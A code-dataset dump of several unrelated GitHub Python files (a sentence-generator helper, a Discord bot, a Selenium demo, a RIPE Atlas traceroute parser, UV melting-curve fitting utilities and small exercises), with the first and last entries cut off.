0\n","repo_name":"eustaceb/gu-gamejam2017","sub_path":"src/game_objects/Bullet.py","file_name":"Bullet.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"70559198170","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 29 18:04:18 2014\n\n@author: Bing Liu\n\"\"\"\nfrom random import random\nfrom random import randint\nimport collections\n\ndef read_configuration(file_name):\n f_r = open(file_name, 'rb')\n ordered_dict = collections.OrderedDict()\n\n for line in f_r:\n sentence_type = line.split(';')[0]\n sentence_description = line.split(';')[1]\n sentence_num = int(line.split(';')[2]) \n ordered_dict[sentence_type + ':' + sentence_description] = sentence_num\n f_r.close()\n return ordered_dict \n\ndef weighted_random(weights_dict):\n number = random()*sum(weights_dict.values())\n for k,v in weights_dict.iteritems():\n if number < v:\n break\n number -= v\n return k\n\ndef random_ele(ele_list):\n return ele_list[randint(0, len(ele_list)-1)]\n\ndef read_weighted_dict(file_name):\n f_r = open(file_name, 'rb')\n weighted_dict = {}\n\n for line in f_r:\n ele = line.split('\\t')[0]\n weight = float(line.split('\\t')[1]) \n weighted_dict[ele] = weight\n f_r.close()\n return weighted_dict\n\ndef read_list(file_name):\n f_r = open(file_name, 'rb')\n ele_list = list()\n\n for line in f_r:\n ele_list.append(line.strip())\n f_r.close()\n return ele_list\n\ndef read_person_names(file_name, name_accu_prob_threshold): \n accu_prob_threshold = name_accu_prob_threshold\n # read female first names from file\n f_r = open(file_name, 'rb')\n name_dist = {}\n \n prob = 0\n for line in f_r:\n name = line.split()[0].title()\n accu = float(line.split()[2])\n if (accu < accu_prob_threshold):\n prob = float(line.split()[1]) \n name_dist[name] = prob\n f_r.close()\n return name_dist\n","repo_name":"HadoopIt/Sentence-Generator","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"6205061255","text":"import discord\nimport os\nimport pymongo\nfrom discord.ext import commands\nfrom keep_alive import keep_alive\n\n\nintents = discord.Intents.default()\nallowed_mentions = discord.AllowedMentions(everyone=False, roles=False)\nintents.members = True\nbot = commands.Bot(command_prefix=commands.when_mentioned_or('eto '), intents=intents, help_command=None, allowed_mentions = allowed_mentions)\ntoken = os.environ.get(\"Bot_Token\")\ndb = pymongo.MongoClient(os.environ['Mongo-DB-secret'])\nif db:\n print(\"Successfully connected to Singapore database.\")\nelse:\n raise \"Could not connect to Singapore database\"\n\nfor extension in os.listdir(\"extensions\"):\n if extension.endswith(\".py\"):\n bot.load_extension(f\"extensions.{extension[:len(extension)-3]}\")\n\n@bot.command(name=\"reload\", description=\"Reloads an extension\")\n@commands.has_permissions(administrator=True)\nasync def reload(ctx, extension=None):\n if extension==None:\n for extension in bot.extensions.copy():\n bot.reload_extension(f\"extensions.{extension}\")\n await ctx.send(\"Reloaded cozyeto\")\n print(\"Reloaded cozyeto\")\n else:\n bot.reload_extension(f\"extensions.{extension}\")\n await ctx.send(\"Done\")\n print(f\"Reloaded {extension}\")\n\n\n@reload.error\nasync def reload_error(ctx, error):\n if isinstance(error, commands.ExtensionNotFound):\n await ctx.send(\"Could not find that 
cog\")\n else:\n await ctx.send(\"Could not reload that cog\")\n raise error\n\n\n@bot.event\nasync def on_ready():\n print('Online!')\n\n\nkeep_alive()\nbot.run(token)","repo_name":"WillingGithubDude/Cozyeto","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36933143865","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder\n\n\ndataset = pd.read_csv(\"data/data.csv\", sep=\",\")\n\ndef label_encoding(df):\n le = LabelEncoder()\n df['diagnosis'] = le.fit_transform(df['diagnosis'])\n return df\n\ndef test_diagnosis_column_():\n dataset = pd.read_csv(\"data/data.csv\", sep=\",\")\n dataset = label_encoding(dataset)\n assert dataset['diagnosis'].dtypes == 'int'\n\n\ndef test_values_diagnosis_column_():\n dataset = pd.read_csv(\"data/data.csv\", sep=\",\")\n dataset = label_encoding(dataset)\n assert dataset['diagnosis'].isin([0,1]).all() == True\n\n\n\n\n\n","repo_name":"Kibika/Causal_Inference","sub_path":"tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"26488035257","text":"# https://programmers.co.kr/learn/courses/30/lessons/72411\nfrom itertools import combinations\nfrom collections import Counter\n\ndef solution(orders, course):\n result = []\n for i in course:\n ord_com = []\n for order in orders:\n ord_com += combinations(sorted(order), i)\n most_ordered = Counter(ord_com).most_common()\n result += [ combi for combi, num in most_ordered if num > 1 and num == most_ordered[0][1]]\n return [ ''.join(i) for i in sorted(result)]\n\n'''\norders\t course\tresult\n[\"ABCFG\", \"AC\", \"CDE\", \"ACDE\", \"BCFG\", \"ACDEH\"]\t [2,3,4]\t[\"AC\", \"ACDE\", \"BCFG\", \"CDE\"]\n[\"ABCDE\", \"AB\", \"CD\", \"ADE\", \"XYZ\", \"XYZ\", \"ACD\"]\t[2,3,5]\t[\"ACD\", \"AD\", \"ADE\", \"CD\", \"XYZ\"]\n[\"XYZ\", \"XWY\", \"WXA\"]\t [2,3,4]\t[\"WX\", \"XY\"]\n'''\n","repo_name":"bigdatachobo/Study","sub_path":"Coding_Test/Programmers/Kakao_2021_coding_test/2번_메뉴_리뉴얼.py","file_name":"2번_메뉴_리뉴얼.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"11952415820","text":"import json, string, sys, copy, ipaddress\n\nimport traceroute as tr\nimport timebins\n\ndebug_traces = False\n#t_addr = \"178.49.128.6\" # In trace 2, hop 5\nt_addr = \"81.23.23.77\"\n\ndef p_trace(nt, hops): #IC in_counts testing\n print(\"trace %d\" % nt)\n for hn,h in enumerate(hops):\n for rn,r in enumerate(h.responders):\n marker = \"\"\n adr = str(r.ip_add)\n if adr == t_addr:\n marker = \" <<<\"\n if rn == 0:\n print(\" %2d: %s (%d) %s\" % (\n hn, adr, len(r.rtts), marker))\n else:\n print(\" : %s (%d) %s\" % (\n adr, len(r.rtts), marker))\n\ndef read_tr_file(tb, f_tb_n, j_line, mx_traces):\n # mx_traces zero -> read whole file\n # Reads Traces into tb.bins[f_tb_n], i.e. for timein tb_n\n # Each line contains data from start_ to stop_time, i.e.one timebin\n empty_traces = too_short_traces = nt = 0\n ta = [] # Append traces from file to ta\n results = json.loads(j_line) # Reads all traces for tb\n for pr in results: # Probe\n #if nt % 1000 == 0:\n # sys.stdout.write(\". 
\"); sys.stdout.flush()\n msm_id = int( pr['msm_id'])\n prb_id = int( pr['prb_id'])\n ts = int( pr['timestamp'])\n bin_nbr = tb.bin_nbr(ts)\n nt += 1\n #if nt <= 4:\n # print(\"rtf: nt %d, ts %d, bin %d\" % (nt, ts, bin_nbr))\n #if bin_nbr == 2:\n # exit()\n dest = \"?\"; empty_traces = too_short_traces = 0\n dest = ipaddress.ip_address(pr['dst_addr'])\n #print(\"=== nt=%d, f_tb_n=%d, msm_id=%d, probe_id=%d, src=%s, ts=%d, >bin_nbr %d<, dest=%s, proto=%s\" %(\n # nt, f_tb_n, msm_id, prb_id, pr['src_addr'], ts, bin_nbr, dest, pr['proto']))\n\n hops = []; empty_hops = 0\n result = pr['result']\n for h in result: # Hops in prb_id result\n hn = h['hop']\n #sys.stdout.write(\"%6d \" % hn)\n if not 'result' in h:\n if 'error' in h:\n if h['error'].find(\"Network is unreachable\") != -1:\n continue # No traceroute for this probe\n print(\" Error: prb_id=%d, %s\" % (prb_id, h['error']))\n else:\n print(\">>> prb_id=%d, No 'result' and no 'error'\" % prb_id)\n continue\n resp_d = {}; loss = 0\n res = h['result']; rx = 0\n while rx < len(res): # Packets in Hop\n p = res[rx]\n #print(\"@@ 1: p = %s\" % p)\n addr = rtt = None\n if 'from' in p: # From address?\n addr = ipaddress.ip_address(p['from'])\n #print(\"@@ 2: addr = %s (%s)\" % (addr, type(addr)))\n if 'late' in p and rx < len(res)-1:\n np = res[rx+1]\n if 'x' in np: # 'from' followed by 'x'\n rtt = np['x'].encode('ascii','replace')\n rx += 1\n else:\n rtt = 'L'\n loss += 1\n else:\n if 'rtt' in p: # Get an rtt\n rtt = p['rtt']\n else:\n rtt = '?'\n loss += 1\n else: # No 'from'\n #if 'x' in p: # lone 'x'\n # rtt = p['x'].encode('ascii','replace')\n loss += 1\n if addr:\n if addr in resp_d:\n resp_d[addr].rtts.append(rtt)\n else:\n resp_d[addr] = tr.Responder(addr, [rtt])\n rx += 1\n resp_a = list(resp_d.values()) # List of responders\n if len(resp_a) == 0: \n empty_hops += 1\n hops.append(tr.Hop(hn, loss, resp_a))\n \n #for hn,h in enumerate(hops): # Look for t_addr\n # for r in h.responders:\n # if str(r.ip_addr) == t_addr:\n # p_trace(nt, hops)\n\n if len(hops) == empty_hops: # No valid hops\n empty_traces += 1\n elif len(hops)-empty_hops < 3: # cleanup_trace() needs 2 valid hops\n too_short_traces += 1\n else:\n t = tr.Trace(msm_id, prb_id, ts, dest, hops)\n # ts from sample in a half-hour json record may be outside\n # the bin by >~ 1 second!\n if bin_nbr >= len(tb.bins):\n print(\"+++ f_tb_n = %d, len(tb.bins) = %d\" % (\n f_tb_n, len(tb.bins)))\n else: # Bin nbr in range [0:n_bins-1]\n ta.append(t)\n\n #print(\"BIN_NBR %d, f_tb_n %d\" % (bin_nbr, f_tb_n))\n return ta, nt, bin_nbr, dest, empty_traces, too_short_traces\n\ndef cleanup_trace(t, tn): # tn = index in bin\n # Remove rfc1918 addresses, and duplicate responder address\n bad = False # Has rfc1918 address or recurring addresses\n if len(t.hops) == 0:\n return 0, 0, 0, 0,0, 0\n \n n_1918_deleted = addrs_deleted = hops_deleted = 0\n total_addrs = total_hops = 0\n if debug_traces: # Before\n print(\"Before\")\n print(\"Trace %d: ts=%d, dest=%s\" % (tn, t.ts, t.dest))\n for j,h in enumerate(t.hops):\n h.print_hop(j)\n print() \n cycle = 0\n while True: # Repeat until all duplicates are removed\n cycle += 1\n #print(\"cycle %d\" % cycle)\n if len(t.hops) > 0:\n d_empties = [] # Remove empty hops\n for hx,h in enumerate(t.hops):\n if len(h.responders) == 0:\n d_empties.append(hx)\n for hx in range(len(d_empties)-1, -1, -1):\n t.hops.pop(d_empties[hx])\n\n bad = False\n # Remove rfc_1918 responders in last hop\n d_dups = []; d_addrs = []\n if len(t.hops) > 0:\n #t.print_trace()\n for n,dr 
in enumerate(t.hops[-1].responders):\n # if dr.ip_addr.is_rfc1918: << using plt / python-libtrace\n dr_ipa = ipaddress.ip_address(dr.ip_addr)\n if dr_ipa.is_private:\n d_dups.append(-1); d_addrs.append(str(dr_ipa))\n n_1918_deleted += 1\n for j in range(len(d_dups)):\n t.hops[-1].responders.pop(d_dups[j])\n bad = True\n for hx in range(len(t.hops)-2, -1, -1): # Keep last occurrence\n # Remove duplicate and rfc_1918 responders in earlier hops\n sra = t.hops[hx].responders # Responders for previous hop (hx)\n dra = t.hops[hx+1].responders # Responders for this hop (hx+1)\n s_dups = []; s_addrs = []\n for dr in dra:\n dr_ipa = ipaddress.ip_address(dr.ip_addr)\n for x,sr in enumerate(sra):\n # if sr.ip_addr.is_rfc1918: << using plt / python-libtrace\n sr_ipa = ipaddress.ip_address(sr.ip_addr)\n if sr_ipa.is_private:\n n_1918_deleted += 1\n if sr_ipa == dr_ipa or sr_ipa.is_private:\n if not str(sr.ip_addr) in s_addrs:\n s_dups.append(x); s_addrs.append(str(sr.ip_addr))\n total_addrs += len(dra)\n if len(s_dups) > 0:\n if debug_traces:\n print(\"trace %d, hx %d, s_dups %s, s_addrs %s\" % (\n tn, hx, s_dups, s_addrs))\n ss_dups = sorted(s_dups)\n for x in range(len(ss_dups)-1, -1, -1):\n sra.pop(ss_dups[x])\n addrs_deleted += len(s_dups)\n bad = True\n total_hops += len(t.hops)\n\n if debug_traces: # After removing empty hops\n print(\"Trace %d: ts=%d, dest=%s, cycle=%d\" % (\n tn, t.ts, t.dest, cycle))\n for j,h in enumerate(t.hops):\n h.print_hop(j)\n print()\n\n if bad:\n for hx in range(len(t.hops)-1, -1, -1):\n if len(t.hops[hx].responders) == 0:\n t.hops.pop(hx)\n hops_deleted += 1\n else:\n break\n\n#? # Delete all but the last mx_hops+1 hops\n#? mx_hops = len(t.hops)\n#? if len(t.hops) > mx_hops+1:\n#? new_hops = t.hops[-(mx_hops+1):]\n#? t.hops = new_hops\n\n # Check for loops in the trace\n resp_addrs = []\n for j,h in enumerate(t.hops):\n for r in h.responders:\n resp_addrs.append(r.ip_addr)\n for j,a in enumerate(resp_addrs):\n if j < len(resp_addrs)-1:\n if resp_addrs[j+1] == a:\n print(\">>> loop in trace %i, j = %2i; %s\" % (\n tn, j, resp_addrs[j+1]))\n\n succ = False\n if len(t.hops) > 0:\n last_responders = t.hops[-1].responders\n #&print(\"tn=%d, last_responders=>%s<, t.dest=>%s<\" % (tn, last_responders, t.dest))\n if len(last_responders) == 1:\n succ = last_responders[0].ip_addr == t.dest\n #print(\"=== deleted: 1918 %d, addrs %d, hops %d, total_hops %d\" % (\n # n_1918_deleted, addrs_deleted, hops_deleted, total_hops))\n\n return n_1918_deleted, addrs_deleted, hops_deleted, \\\n total_addrs, total_hops, succ\n\ndef cleanup_bin(tb, bn):\n if bn >= len(tb.bins): # Ignore bins outside range [0:n_bins-1]\n return\n t_traces = t_1918_deleted = t_addrs_deleted = t_hops_deleted = 0\n t_addrs = t_hops = t_succ = 0\n #print(\"cleanup_bin(%d), tb=%s\" % (bn, tb))\n for tn,t in enumerate(tb.bins[bn]):\n t_traces += 1\n if t_traces % 1000 == 0:\n sys.stdout.write(\"- \"); sys.stdout.flush()\n #print(\"bn=%d, tn=%d, t = %s\" % (bn, tn, t))\n n_1918_deleted, addrs_deleted, hops_deleted, n_addrs, \\\n n_hops, succ = cleanup_trace(t, tn)\n\n t_1918_deleted += n_1918_deleted\n t_addrs_deleted += addrs_deleted\n t_hops_deleted += hops_deleted\n t_addrs += n_addrs\n t_hops += n_hops\n if succ:\n t_succ += 1\n print(\"*** tot_traces %d, tot_addrs %d, tot_hops %d, tot_succ %d\" % (\n t_traces, t_addrs, t_hops, t_succ))\n print(\"*** rfc1918 deleted %d, recurring addrs %d, hops %d\\n\" % (\n t_1918_deleted, t_addrs_deleted, t_hops_deleted))\n return t_traces, t_addrs, t_hops, t_succ, 
t_addrs_deleted, t_hops_deleted\n","repo_name":"nevil-brownlee/Atlas-graphs","sub_path":"read_atlas_gz.py","file_name":"read_atlas_gz.py","file_ext":"py","file_size_in_byte":10478,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"42397316560","text":"from django.utils.translation import ugettext_lazy as _\nfrom django.contrib.auth import get_user_model\nfrom django import forms\n\n# Get the user from settings\nUser = get_user_model()\n\n\nclass SendEmailForm(forms.Form):\n    \"\"\"\n    Form to send email to admin user.\n    \"\"\"\n\n    name = forms.CharField(\n        max_length=100,\n        label=_(\"Name\"),\n        help_text=_(\"Insert your name.\")\n    )\n\n    email = forms.EmailField(\n        label=_(\"Email\"),\n        help_text=_(\"Insert your email.\")\n    )\n\n    message = forms.CharField(\n        max_length=1000,\n        label=_(\"Message\"),\n        help_text=_(\"Insert the message.\"),\n        widget=forms.Textarea\n    )\n","repo_name":"2018-1-Testes-Grupo-6/TBL","sub_path":"core/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"29278460940","text":"from selenium import webdriver\r\nimport selenium\r\nimport time\r\nchrome_options = webdriver.ChromeOptions()\r\nchrome_options.binary_location = r\"C:\\Program Files (x86)\\Google\\Chrome Beta\\Application\\chrome.exe\"\r\n\r\nprefs = {\"profile.managed_default_content_settings.images\": 2}\r\nchrome_options.add_experimental_option(\"prefs\", prefs)\r\n# chrome_options.add_argument('--headless')\r\nchrome_options.add_argument('--disable-gpu')\r\ndriver = webdriver.Chrome(\r\n    executable_path=r\"D:/HUST/BI/BI/chromedriver.exe\",\r\n    chrome_options=chrome_options\r\n)\r\n\r\n\r\ndriver.get('http://www.google.com/')\r\ntime.sleep(5) # Let the user actually see something!\r\nsearch_box = driver.find_element_by_name('q')\r\nsearch_box.send_keys('ChromeDriver')\r\nsearch_box.submit()\r\ntime.sleep(5) # Let the user actually see something!\r\ndriver.quit()","repo_name":"thanhdath/RealtimeTrendingKeywords","sub_path":"test/run_selenium.py","file_name":"run_selenium.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"35868127040","text":"#!/usr/bin/python3\n# Anas Jelloul\n\"\"\"Implement insertion function.\"\"\"\n\n\ndef append_after(filename=\"\", search_string=\"\", new_string=\"\"):\n    \"\"\"Insert text after each line containing a given string in a file.\n\n    Args:\n        filename (str): name_file.\n        search_string (str): searched string.\n        new_string (str): string to be inserted.\n    \"\"\"\n    txt = \"\"\n    with open(filename) as r:\n        for ln in r:\n            txt += ln\n            if search_string in ln:\n                txt += new_string\n    with open(filename, \"w\") as w:\n        w.write(txt)\n","repo_name":"anasjelloule/alx-higher_level_programming","sub_path":"0x0B-python-input_output/100-append_after.py","file_name":"100-append_after.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72740447130","text":"movimientos = {\n    0: [6, 4],\n    1: [6, 8],\n    2: [7, 9],\n    3: [4, 8],\n    4: [3, 9, 0],\n    5: [],\n    6: [1, 7, 0],\n    7: [2, 6],\n    8: [1, 3],\n    9: [2, 4]\n}\n\n# We will use memoization to store the computed results\nmemo = {}\n\n\ndef calcular(inicio, pasos, n):\n    # Check if we have already computed this before\n    if (inicio, pasos, n) in memo:\n        return memo[(inicio, pasos, 
n)]\n\n    movs = 0\n    if pasos == 0:\n        return 1\n    if n > 0:\n        for siguiente in movimientos[inicio]:\n            movs += calcular(siguiente, pasos - 1, n - 1)\n\n    # Store the computed result in the memo\n    memo[(inicio, pasos, n)] = movs\n\n    return movs\n\n\ndef totalizar(pasos, n):\n    total = 0\n    for i in range(10):\n        total += calcular(i, pasos, n)\n    return total\n\n\nn = 100 # Specify the number of moves\ntotal_movements = totalizar(n, n)\nprint(f\"Total moves for {n} steps: {total_movements}\")","repo_name":"frankiyonki/Tarea1","sub_path":"tarea1/caballo.py","file_name":"caballo.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37270278774","text":"\"\"\"\r\nFunctions for UV melting analysis\r\n\"\"\"\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom scipy import stats\r\nimport os, json\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.ticker import (MultipleLocator, FormatStrFormatter,\r\n                               AutoMinorLocator)\r\nfrom matplotlib.backends.backend_pdf import PdfPages\r\nimport seaborn as sns\r\nfrom tqdm import tqdm\r\nfrom lmfit import minimize, Minimizer, Parameters, report_fit\r\nfrom scipy.interpolate import interp1d\r\nfrom scipy import signal\r\nfrom hampel import hampel\r\nfrom .util import *\r\nfrom . import processing\r\n\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\ndef get_blanked_fn(fn):\r\n    split_fn = os.path.splitext(fn)\r\n    blanked_fn = split_fn[0] + '_blanked' + split_fn[1]\r\n    return blanked_fn\r\n\r\ndef query_curve_in_df(df, curve_name):\r\n    \"\"\"\r\n    Args:\r\n        curve_name - Dict\r\n    \"\"\"\r\n    row = df.query(\"curve_date == '%s' & curve_num == '%s'\" % (curve_name['curve_date'], curve_name['curve_num']))\r\n    return row\r\n\r\ndef lookup_sample_df(df, df_ref, key):\r\n    # looks up `key` in `df_ref`\r\n    return df.apply(lambda row: df_ref.query(\"curve_date == '%s' & curve_num == '%s'\" % (row['curve_date'], row['curve_num']))[key].values[0], axis=1)\r\n\r\ndef find_blank_reference_curve_str(curve_str: str, blank_to):\r\n    if not np.isnan(blank_to):\r\n        curve_str_list = curve_str.split('_')\r\n        blank_curve_str = '%s_%d_%s' % (curve_str_list[0], blank_to, curve_str_list[2])\r\n    else:\r\n        blank_curve_str = curve_str\r\n    return blank_curve_str\r\n\r\ndef format_cd_data(fn):\r\n    \"\"\"\r\n    Format CD txt data to the same as from ECL\r\n    \"\"\"\r\n    curve = pd.read_table(fn, header=None)\r\n\r\n    curve.columns = ['celsius', 'cd', 'v', 'absorbance']\r\n    curve.drop(columns = ['cd', 'v'], inplace=True)\r\n\r\n    curve.to_csv(fn.replace('.txt', '.csv'), index=False, header=None)\r\n    \r\n\r\ndef read_curve(fn):\r\n    curve = pd.read_csv(fn, header=None)\r\n    curve.columns = ['celsius', 'absorbance']\r\n    curve.sort_values(by='celsius', inplace=True)\r\n    return curve\r\n    \r\ndef read_sample_sheet(fn):\r\n    sample_df = pd.read_csv(fn, index_col=0)\r\n    sample_df['curve_date'] = sample_df['curve_date'].astype(str)\r\n    sample_df['curve_num'] = sample_df['curve_num'].astype(str)\r\n    \r\n    #----- fill out default settings -----\r\n    sample_df.celsius_min.fillna(sample_df.MinTemperature, inplace=True)\r\n    sample_df.celsius_max.fillna(sample_df.MaxTemperature, inplace=True)\r\n    # sample_df.loc[np.logical_and(sample_df.Blank == \"manual\", sample_df.SEQID != 'blank'), \"BlankTo\"].fillna(7)\r\n    sample_df.loc[:,\"BlankTo\"].fillna(int(7), inplace=True)\r\n    \r\n    return sample_df\r\n\r\ndef parse_curve_name(fn):\r\n    curve_date = fn.split('/')[-2].split('_')[0]\r\n    
curve_num = fn.split('/')[-1].split('_')[0]\r\n    curve_name = fn.split('/')[-1].split('_')[1].split('.csv')[0]\r\n    curve_str = f'{curve_date}_{curve_num}_{curve_name}'\r\n    return dict(curve_date=curve_date, curve_num=curve_num, \r\n                curve_name=curve_name, curve_str=curve_str)\r\n\r\ndef format_fit_result(out):\r\n    result_dict = {}\r\n    for p in ('dH', 'Tm', 'fmax', 'fmin', 's1', 's2'):\r\n        result_dict[p] = out.params[p].value\r\n        result_dict[p+'_std'] = out.params[p].stderr\r\n    result_dict['rmse'] = np.sqrt(np.mean(np.square(out.residual)))\r\n    return result_dict\r\n\r\ndef plot_curve_basic(curve):\r\n    plt.plot(curve.celsius, curve.absorbance, '.')\r\n\r\ndef plot_curve_fit_result(row, return_curve=False):\r\n    fn = row['data_file']\r\n    blanked_fn = get_blanked_fn(fn)\r\n    if os.path.isfile(blanked_fn):\r\n        fn = blanked_fn\r\n    curve = read_curve(fn)\r\n    \r\n    curve_predict = curve_model(curve.celsius, **{x:row[x] for x in ['dH','Tm','fmax','fmin','s1', 's2']})\r\n    plt.plot(curve.celsius, curve.absorbance, '.')\r\n    plt.plot(curve.celsius, \r\n             curve_predict - curve_predict[0] + curve.absorbance[0])\r\n    plt.axvline(row['Tm'], linestyle='--', c='gray')\r\n    \r\n    if 'SEQID' in row.index:\r\n        plt.title('%s %s' % (row['SEQID'], row['curve_name']))\r\n    else:\r\n        plt.title('%s' % (row['data_file']))\r\n    sns.despine()\r\n    plt.show()\r\n    \r\n    if return_curve:\r\n        return curve\r\n    \r\ndef plot_curve_preview_of_datadir(datadir:str, sample_sheet_file:str, plot_fn:str=None):\r\n    \"\"\"\r\n    Plot raw absorbance of all curves in a single pdf file for preview and troubleshooting.\r\n    Upper row: raw\r\n    Lower row: if manual blank, the blanked curves\r\n    \"\"\"\r\n    color_dict = dict(\r\n        MeltingCurve='#a6cee3',\r\n        CoolingCurve='#1f78b4',\r\n        SecondaryMeltingCurve='#b2df8a',\r\n        SecondaryCoolingCurve='#33a02c',\r\n        TertiaryMeltingCurve='#fb9a99',\r\n        TertiaryCoolingCurve='#e31a1c'\r\n    )\r\n    \r\n    if plot_fn is None:\r\n        plot_fn = os.path.join(datadir, \"preview_raw_absorbance_all_curves.pdf\")\r\n    \r\n    data_list = [fn for fn in absolute_file_paths(datadir) if fn.endswith('.csv')]\r\n    sample_sheet = read_sample_sheet(sample_sheet_file)#.iloc[-21:,:]\r\n    \r\n    result_df = make_empty_result_df(data_list, sample_sheet, blank=True)\r\n    result_df.sort_values(by=['curve_date', 'curve_num'], inplace=True)\r\n    result_df['SEQID'] = lookup_sample_df(result_df, sample_sheet, 'SEQID')\r\n    result_df['Blank'] = lookup_sample_df(result_df, sample_sheet, 'Blank')\r\n    curve_dates = np.unique(result_df.curve_date)\r\n    figs = [None for _ in range(len(curve_dates))]\r\n    \r\n    for i,curve_date in enumerate(curve_dates):\r\n        formatted_curve_date = '%s-%s-%s %s:00' % (curve_date[:2], curve_date[2:4], curve_date[4:6], curve_date[6:])\r\n        figs[i], ax = plt.subplots(2,7,figsize=(12,4), sharex=False, sharey=False)\r\n        # ax=ax.flatten()\r\n        plt.suptitle(formatted_curve_date)\r\n        exp_df = result_df.query('curve_date == \"%s\"'%curve_date)\r\n        for j,row in exp_df.iterrows():\r\n            # raw curves\r\n            curve = read_curve(row.data_file)\r\n            curve_num = int(row.curve_num)\r\n            curve_color = color_dict[row.curve_name]\r\n            ax[0,curve_num-1].plot(curve.celsius, curve.absorbance, \r\n                                   c=curve_color, linewidth=2)\r\n            try:\r\n                seqid = row['SEQID']\r\n            except:\r\n                seqid = \"\"\r\n            ax[0,curve_num-1].set_title(seqid)\r\n            \r\n            # blanked curves\r\n            if row.Blank == 'manual':\r\n                try:\r\n                    blank_curve = read_curve(exp_df.query('curve_num == \"7\" & curve_name == \"%s\"'%row.curve_name).data_file.values[0])\r\n                    blanked_curve = curve.absorbance - blank_curve.absorbance\r\n                    
ax[1,curve_num-1].plot(curve.celsius, blanked_curve,\r\n c=curve_color, linewidth=2, linestyle=':')\r\n except:\r\n pass\r\n \r\n sns.despine()\r\n \r\n _ = [ax[1,i].set_xlabel('Celsius (°C)') for i in range(7)]\r\n _ = [ax[i,0].set_ylabel('Absorbance') for i in range(2)]\r\n \r\n save_multi_image(plot_fn, figs)\r\n \r\n return result_df\r\n\r\ndef get_2nd_diff_autocorrelation(y, plot=False):\r\n y = y - np.mean(y)\r\n yacorr = np.correlate(y, y, 'full')[:len(y)]\r\n yacorr = yacorr / np.var(y) / len(y)\r\n yacorr_2diff = np.diff(yacorr, n=2)\r\n if plot:\r\n _,ax = plt.subplots(1,3, figsize=(12,2))\r\n ax[0].plot(y)\r\n ax[1].plot(yacorr)\r\n ax[2].plot(yacorr_2diff)\r\n \r\n return yacorr_2diff\r\n\r\ndef qc_blank_curve(curve):\r\n isgood = True\r\n zscore = np.nanstd(curve.absorbance) / np.nanmedian(curve.absorbance)\r\n if zscore > 0.2:\r\n isgood = False\r\n acorr_2diff = get_2nd_diff_autocorrelation(curve.absorbance)\r\n if np.max(np.abs(acorr_2diff)) > 0.005:\r\n isgood = False\r\n return isgood\r\n\r\n### Directly fit the curves ###\r\ndef curve_model(x, dH, Tm, fmin, fmax, s1, s2):\r\n # define the function\r\n return fmin + s1 * x + (((s2 - s1) * x + fmax - fmin)/(1 + np.exp(dH /0.0019872 * ((Tm + 273.15)**(-1) - (x + 273.15)**(-1)))))\r\n\r\ndef residual(pars, x, data):\r\n dH, Tm, fmax, fmin, s1, s2 = pars['dH'], pars['Tm'], pars['fmax'], pars['fmin'], pars['s1'], pars['s2']\r\n model = curve_model(x, dH, Tm, fmin, fmax, s1, s2)\r\n return model - data\r\n\r\ndef fit_param_direct(curve, Tm=None, celsius_min=5, celsius_max=95, smooth=True, plot_title=''):\r\n pfit = Parameters()\r\n data_max = np.max(curve.absorbance)\r\n data_min = np.min(curve.absorbance)\r\n pfit.add(name='dH', value=-20)\r\n if Tm is None:\r\n pfit.add(name='Tm', value=(celsius_max + celsius_min) * 0.5)\r\n else:\r\n pfit.add(name='Tm', value=Tm, vary=False)\r\n \r\n pfit.add(name='fmax', value=2*data_max, min=data_min, max=20*data_max)\r\n pfit.add(name='fmin', value=max(0.2*data_min, 0.01), min=-0.1, max=data_max)\r\n pfit.add(name='s1', value = 1e-5, max=5.0, min=-1.0)\r\n pfit.add(name='s2', value = 1e-5, max=2.0, min=-2.0)\r\n # pfit.add(name='delta_f', )\r\n\r\n curve_used = curve.query(f'celsius >= {celsius_min} & celsius <= {celsius_max}')\r\n if smooth:\r\n # Anomaly detection with hampel\r\n outlier_idx = hampel(curve_used.loc[:, 'absorbance'])\r\n curve_used.drop(index = curve_used.index[outlier_idx], inplace=True)\r\n\r\n out_tmp = minimize(residual, pfit, args=(curve_used.celsius,), \r\n kws={'data': curve_used.absorbance})\r\n \r\n pfit['Tm'].set(vary=True)\r\n for p in ['dH', 'fmin', 'fmax', 's1', 's2']:\r\n pfit[p].set(value=out_tmp.params[p].value)\r\n \r\n out = minimize(residual, pfit, args=(curve_used.celsius,), \r\n kws={'data': curve_used.absorbance})\r\n \r\n best_fit = curve_used.absorbance + out.residual\r\n \r\n fig, ax = plt.subplots(figsize=(4,3))\r\n ax.plot(curve.celsius, curve.absorbance, '+', c='purple')\r\n ax.plot(curve_used.celsius, curve_used.absorbance, 'x', c='g')\r\n ax.plot(curve_used.celsius, best_fit, 'orange', linewidth=2.5)\r\n ax.set_xlabel('temperature (°C)')\r\n ax.set_ylabel(r'absorbance')\r\n ax.set_title(plot_title)\r\n sns.despine()\r\n \r\n return 